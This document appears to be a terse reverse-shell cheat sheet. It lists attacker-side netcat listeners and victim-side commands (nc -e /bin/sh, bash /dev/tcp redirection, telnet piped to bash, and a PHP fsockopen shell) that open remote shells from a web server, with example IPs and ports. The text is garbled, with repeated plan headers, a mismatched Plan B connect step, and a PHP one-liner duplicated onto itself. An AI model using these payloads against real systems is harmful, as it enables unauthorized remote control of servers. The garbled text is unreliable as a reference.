PLAN #A
*** Our side :
nc -l -v $myipaddress $myport
sp8bowl:~ spikecursed$ nc -l -v 10.0.50.100 5443
*** Remote side :
nc -e /bin/sh $myipaddress $myport
websrv:~ users$ nc -e /bin/sh 10.0.50.100 5443
or
/bin/sh | nc $myipaddress $myport
websrv:~ users$ /bin/sh | nc 10.0.50.100 5443
PLAN #B
*** Remote side :
bash -i >& /dev/tcp/$theiripaddress/$theirport 0>&1
PLAN #B
*** Remote side :
bash -i >& /dev/tcp/$theiripaddress/$theirport 0>&1
websrv:~ users$ bash -i>& /dev/tcp/10.1.50.100/5443 0>&1
*** Our side :
nc $theiripaddress $theirport
*** Our side :
nc $theiripaddress $theirport
sp8bowl:~ spikecursed$ nc 10.1.50.100 5443
PLAN #C
*** Our side :
nc -l -v $myipaddress $myport
telnet $myipaddress $myport | /bin/bash
websrv:~ users$ telnet 10.1.50.100 5443
PLAN #D
*** Our side :
nc -l -v $myipaddress $myport
sp8bowl:~ spikecursed$ nc -l -v 10.0.50.100 5443
PLAN #C
*** Our side :
nc -l -v $myipaddress $myport
sp8bowl:~ spikecursed$ nc -l -v 10.1.50.100 5443
*** Remote side :telnet $myipaddress $myport | /bin/bash
websrv:~ users$ telnet 10.1.50.100 5443
PLAN #D
*** Our side :
nc -l -v $myipaddress $myport
sp8bowl:~ spikecursed$ nc -l -v 10.0.50.100 5443
*** Remote side :
php -r '$sock=fsockopen("$myipaddress",$myport);exec("/bin/sh -i <&3 >&3 2>&3");'
websrv:~ users$ php -r '$sock=fsockopen("10.0.50.100",$myport);exec("/bin/sh -i <&3 >&3 2>&3");'php -r '$sock=fsockopen("$myipaddress",$myport);exec("/bin/sh -i <&3 >&3 2>&3");'